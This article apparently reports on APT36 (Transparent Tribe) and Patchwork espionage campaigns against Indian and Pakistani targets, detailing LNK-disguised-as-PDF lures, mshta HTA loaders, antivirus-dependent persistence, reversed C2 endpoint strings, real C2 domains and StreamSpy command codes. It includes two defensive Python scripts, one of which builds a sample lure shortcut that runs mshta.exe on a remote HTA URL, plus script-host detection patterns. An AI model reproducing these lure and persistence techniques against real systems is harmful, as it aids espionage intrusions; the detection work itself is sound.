The threat actor known as Transparent Tribe has been attributed to a new set of attacks targeting Indian government, academic and strategic entities with a Remote Access Trojan (RAT) that gives the attackers persistent control over compromised hosts.
“The campaign employs deceptive delivery techniques, including a weaponized Windows Shortcut (LNK) file disguised as a legitimate PDF document and embedded with the full PDF content to avoid user suspicion,” CYFIRMA said in a technical report.
Transparent Tribe, also known as APT36, is a hacking group known for its growing cyber espionage campaigns against Indian organizations. Assessed to be of Pakistani origin, the state-sponsored outfit has been active since at least 2013.
The threat actor maintains an ever-evolving arsenal of RATs to achieve its goals. Trojans used by Transparent Tribe in recent years include CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.
The latest set of attacks begins with a spear-phishing email carrying a ZIP archive that contains an LNK file disguised as a PDF. Opening the shortcut launches “mshta.exe” to execute a remote HTML Application (HTA) script, which decrypts the final RAT payload and loads it directly into memory. The HTA also downloads and opens a decoy PDF document so that the victim sees the document they expected and has no reason for suspicion.
“Once the decoding logic is established, HTA leverages ActiveX objects, specifically WScript.Shell, to interact with the Windows environment,” CYFIRMA said. “This behavior exhibits environment profiling and runtime manipulation, ensuring compatibility with the target system and enhancing execution reliability, techniques commonly seen in malware that abuses ‘mshta.exe’.”
A notable aspect of the malware is its ability to adapt its persistence method depending on the antivirus solutions installed on the infected machine –
- If Kaspersky is detected, it creates a working directory under “C:\Users\Public\core\”, writes an obfuscated HTA payload to disk, and installs persistence by dropping an LNK file in the Windows Startup folder, which, in turn, launches the HTA script using “mshta.exe”.
- If Quick Heal is detected, it establishes persistence by creating a batch file and a malicious LNK file in the Windows Startup folder, writing the HTA payload to disk, and then invoking it through the batch script.
- If Avast, AVG, or Avira is detected, it works by directly copying the payload to the startup directory and executing it.
- If no recognized antivirus solution is found, it falls back to a combination of batch file execution, registry-based persistence, and payload deployment before launching the batch script.
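Added example (not code from the CYFIRMA report or from the threat actor): a Python triage script for document-disguised shortcuts of the kind described above. It parses the Shell Link header and StringData fields of a .lnk file, then flags the traits of the lure: a double extension such as .pdf.lnk, a target that is a script host such as mshta.exe, a command line that fetches a remote resource, and a document-viewer icon sitting on a non-document target. The same check applies to the Startup-folder shortcut that the Kaspersky persistence path drops. The shortcut bytes, the file names and the placeholder URL on example.invalid are constructed for the example; nothing in it is an indicator from the report.

```python
import re
import struct

# HeaderSize (0x4C) followed by the fixed Shell Link CLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) selecting the optional structures that follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION = 0x04, 0x08, 0x10, 0x20, 0x40

# StringData fields appear in this fixed order, each present only when its flag is set.
STRING_FIELDS = (
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
)

SCRIPT_HOSTS = re.compile(
    r"\b(mshta|cmd|powershell|pwsh|wscript|cscript|rundll32|regsvr32|msiexec|certutil)(\.exe)?\b", re.I)
REMOTE_REF = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)   # URL or UNC path
DOC_DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)\.lnk$", re.I)
DOC_VIEWER_ICON = re.compile(r"acro|adobe|winword|excel|\.pdf$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file, skipping the IDList and LinkInfo blocks."""
    if len(data) < 76 or data[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # end of the fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]   # IDListSize excludes itself
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize includes itself
    fields = {}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]      # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(filename: str, data: bytes) -> dict:
    """Score one shortcut; an empty 'findings' list means nothing lure-like was seen."""
    f = parse_lnk(data)
    command_line = " ".join(x for x in (f.get("relative_path", ""), f.get("arguments", "")) if x)
    findings = []
    if DOC_DOUBLE_EXT.search(filename):
        findings.append("double extension: shortcut named like a document")
    host = SCRIPT_HOSTS.search(command_line)
    if host:
        findings.append("target is a script host: " + host.group(0))
    if REMOTE_REF.search(command_line):
        findings.append("command line references a remote resource")
    if host and DOC_VIEWER_ICON.search(f.get("icon_location", "")):
        findings.append("document-viewer icon on a script-host target (masquerading)")
    return {"file": filename, "command_line": command_line, "findings": findings}


def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "") -> bytes:
    """Construct a minimal Unicode .lnk carrying only StringData (enough for parse_lnk)."""
    values = {"relative_path": relative_path, "arguments": arguments, "icon_location": icon_location}
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_ICON_LOCATION if icon_location else 0
    header = bytearray(76)
    header[:20] = LNK_MAGIC
    struct.pack_into("<I", header, 20, flags)
    struct.pack_into("<I", header, 60, 1)  # ShowCommand = SW_SHOWNORMAL
    body = b"".join(struct.pack("<H", len(values[k])) + values[k].encode("utf-16-le")
                    for k, bit in STRING_FIELDS if flags & bit)
    return bytes(header) + body


# Constructed samples: a lure in the style described above and a benign shortcut to a PDF.
# example.invalid is a placeholder domain, not an indicator from the report.
SAMPLES = {
    "Advisory.pdf.lnk": build_lnk(
        r"..\..\..\Windows\System32\mshta.exe",
        "https://example.invalid/advisory.hta",
        r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
    ),
    "Quarterly report.lnk": build_lnk(
        r"..\..\..\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
        r"C:\Users\Public\Documents\report.pdf",
    ),
}


def triage_all(samples: dict = SAMPLES) -> dict:
    return {name: triage_lnk(name, blob) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, result in triage_all().items():
        print(name, "->", result["findings"] or "clean")
```

Run it as a script to see the constructed lure flagged on all four traits and the benign shortcut reported clean. Against real files, feed `triage_lnk` the bytes of each shortcut found in a mail attachment or in a user's Startup folder; the parser deliberately skips the IDList and LinkInfo blocks, so a shortcut whose target lives only in the IDList (no RELATIVE_PATH) will show an empty command line and should be inspected by hand.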
The second HTA file carries a DLL named “iinneldc.dll” that acts as a fully featured RAT, supporting remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
“APT36 (Transparent Tribe) remains a highly persistent and strategically driven cyber-espionage threat with a sustained focus on intelligence collection targeting Indian government entities, academic institutions and other strategically relevant sectors,” the cyber security company said.
In recent weeks, APT36 has also been linked to another campaign that leverages a malicious shortcut file disguised as a government advisory PDF (“NCERT-Whatsapp-Advisory.pdf.lnk”) to deliver a .NET-based loader, which drops additional executables and malicious DLLs to establish remote command execution, system reconnaissance, and long-term access.
The shortcut is designed to execute an obfuscated command using cmd.exe to retrieve an MSI installer (“nikmights.msi”) from a remote server (“aeroclubofindia.co[.]in”), which then carries out a series of actions –
- Extract and display a decoy PDF document to the victim
- Decode and write the DLL files to “C:\ProgramData\PcDirvs\pdf.dll” and “C:\ProgramData\PcDirvs\wininet.dll”
- Drop “PcDirvs.exe” in the same location and execute it after a 10-second delay
- Establish persistence by creating “PcDirvs.hta”, which contains a Visual Basic script that modifies the registry so that “PcDirvs.exe” is launched at every system startup.
It is worth pointing out that the displayed lure PDF is a legitimate advisory issued by the Pakistan National Cyber Emergency Response Team (PKCERT) in 2024 regarding a fraudulent WhatsApp message campaign targeting government entities in Pakistan with a malicious WinRAR file that infects systems with malware.
The “wininet.dll” DLL connects to hard-coded command-and-control (C2) infrastructure at dns.wmiprovider[.]com, a domain registered in mid-April 2025. The C2 is currently inactive, but the registry-based persistence means the implant can be revived at any time in the future.
“The DLL implements multiple HTTP GET-based endpoints to communicate with the C2 server to establish, update, and retrieve commands issued by the attacker,” CYFIRMA said. “To avoid static string detection, endpoint characters are intentionally stored in reverse order.”
The list of endpoints is as follows –
- /retsiger (register), to register the infected system with the C2 server
- /taebtraeh (heartbeat), to signal to the C2 server that the infected host is still alive
- /dnammoc_teg (get_command), to retrieve commands from the C2 server, which are then executed via “cmd.exe”
- /dnammocmvitna (antivmcommand), to query or set anti-VM state and potentially adjust behavior
The DLL also queries the antivirus products installed on the victim system, making it a capable tool for reconnaissance and the collection of sensitive information.
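Added example (not CYFIRMA's tooling and not the DLL's own code): how to catch the reversed-endpoint trick statically. A plain search for register or heartbeat finds nothing in a binary that stores retsiger and taebtraeh, so the script below extracts ASCII and UTF-16LE strings the way strings does, reverses each alphanumeric token and matches it against the endpoint names from the report. The byte blob is constructed to stand in for a data section of the DLL; the four endpoint names are the ones listed above and nothing else is taken from the sample.

```python
import re

# Plaintext endpoint names CYFIRMA lists for the DLL; on disk they are stored character-reversed.
KNOWN_ENDPOINTS = {"register", "heartbeat", "get_command", "antivmcommand"}


def decode_endpoint(stored: str) -> str:
    """Undo the reversal the DLL performs at runtime: '/dnammoc_teg' -> '/get_command'."""
    return "/" + stored.lstrip("/")[::-1]


def reversed_signatures(names=frozenset(KNOWN_ENDPOINTS)) -> set:
    """The literals a static rule must actually carry, e.g. 'retsiger' rather than 'register'."""
    return {n[::-1] for n in names}


def extract_strings(blob: bytes, min_len: int = 6):
    """Like `strings -a`: printable ASCII runs plus UTF-16LE runs, which Windows binaries favour."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        yield m.group().decode("ascii")
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob):
        yield m.group().decode("utf-16-le")


def find_reversed_endpoints(blob: bytes) -> dict:
    """Map every reversed token found in the blob to the endpoint path it decodes to."""
    hits = {}
    for s in extract_strings(blob):
        for token in re.findall(r"[A-Za-z_]+", s):
            if token.lower()[::-1] in KNOWN_ENDPOINTS:
                hits[token] = decode_endpoint(token)
    return hits


def naive_grep(blob: bytes, names=frozenset(KNOWN_ENDPOINTS)) -> set:
    """What `strings | grep register` sees: nothing, which is the point of storing them reversed."""
    return {n for n in names if n.encode() in blob}


# Constructed stand-in for a data section of the DLL: three reversed endpoints as ASCII, one as a
# UTF-16LE string, separated by padding and surrounded by unrelated bytes.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + bytes(12)
    + b"retsiger\x00taebtraeh\x00/dnammoc_teg\x00\x00\x00"
    + "dnammocmvitna".encode("utf-16-le") + b"\x00\x00"
    + b"User-Agent: Mozilla/5.0\x00" + b"\xff\xfe\x13\x37"
)

if __name__ == "__main__":
    print("plain grep finds:", naive_grep(SAMPLE_BLOB) or "nothing")
    for token, endpoint in find_reversed_endpoints(SAMPLE_BLOB).items():
        print(f"{token!r} -> {endpoint}")
```

`reversed_signatures()` gives the literals to put into a static rule; `find_reversed_endpoints` is the more general check for samples that may rotate or extend the endpoint set, since it reverses everything it extracts and only then compares. Reversal is a weak transformation on purpose here: the DLL has to undo it at runtime, so an emulator or a debugger breakpoint on the HTTP call will see the plaintext path regardless.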
Patchwork linked to new StreamSpy trojan
The revelation comes weeks after Patchwork (aka Dropping Elephant or Maha Grass), a hacking group believed to be of Indian origin, was linked to attacks targeting Pakistan’s defense sector with a Python-based backdoor distributed through phishing emails carrying ZIP files, according to security researcher Idan Tarab.
Contained within the archive is an MSBuild project file which, when executed via “msbuild.exe”, ultimately deploys a dropper that installs and launches the Python RAT. The malware can contact the C2 server, run remote Python modules, execute commands, and upload and download files.
“This campaign represents a modern, highly obfuscated Patchwork APT toolkit that includes the MSBuild LOLBin loader, PyInstaller-modified Python runtime, marshalled bytecode implosion, geofencing, random PHP C2 endpoints, [and] realistic persistence mechanisms,” Tarab said.
As of December 2025, Patchwork has also been linked to a previously undocumented trojan named StreamSpy, which uses both WebSocket and HTTP protocols for C2 communications. The WebSocket channel is used to receive instructions and transmit execution results, while HTTP is used for file transfer.
StreamSpy’s link to Patchwork, according to QiAnXin, stems from its similarity to Spyder, a variant of another backdoor named WarHawk that is attributed to SideWinder. Patchwork has used Spyder since 2023.
Delivered via ZIP archives (“OPS-VII-SIR.zip”) hosted on “FirebaseCloudMail[.]com”, the malware (“Annexure.exe”) can collect system information, establish persistence via the Windows Registry, scheduled tasks, or an LNK file in the Startup folder, and communicate with C2 servers over HTTP and WebSocket. The list of supported commands is below –
- F1A5C3, to download a file and open it using ShellExecuteExW
- B8C1D2, to set the shell for command execution to cmd
- E4F5A6, to set the shell for command execution to PowerShell
- FL_SH1, to close all shells
- C9E3D4, E7F8A9, H1K4R8, C0V3RT, to download encrypted ZIP files from the C2 server, extract them, and open them using ShellExecuteExW
- F2B3C4, to gather information about the file system and all disks connected to the device
- D5E6F7, to upload and download files
- A8B9C0, to upload a file
- D1E2F3, to delete a file
- A4B5C6, to rename a file
- D7E8F9, to count the entries in a specific folder
QiAnXin said the StreamSpy download site also hosts Spyder variants with extensive data collection features, and that the malware’s digital signature shows a correlation with a different Windows RAT called ShadowAgent, attributed to the DoNot Team (aka Brainworm). Interestingly, 360 Threat Intelligence Center flagged the executable “Annexure.exe” as ShadowAgent in November 2025.
“The emergence of the StreamSpy Trojan and Spyder variants from the Maha Grass group indicates that the group is constantly retooling its arsenal of attack tools,” the Chinese security vendor said.
“In the StreamSpy Trojan, attackers attempt to use WebSocket channels for command issuance and result feedback to trace HTTP traffic and evade censorship. Additionally, correlated samples confirm that the Maha Grass and DoNot attack groups have some connections in terms of resource sharing.”